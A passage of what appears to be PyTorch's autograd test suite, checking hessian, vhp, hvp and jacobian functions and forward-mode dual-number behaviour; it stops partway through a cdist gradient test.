self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
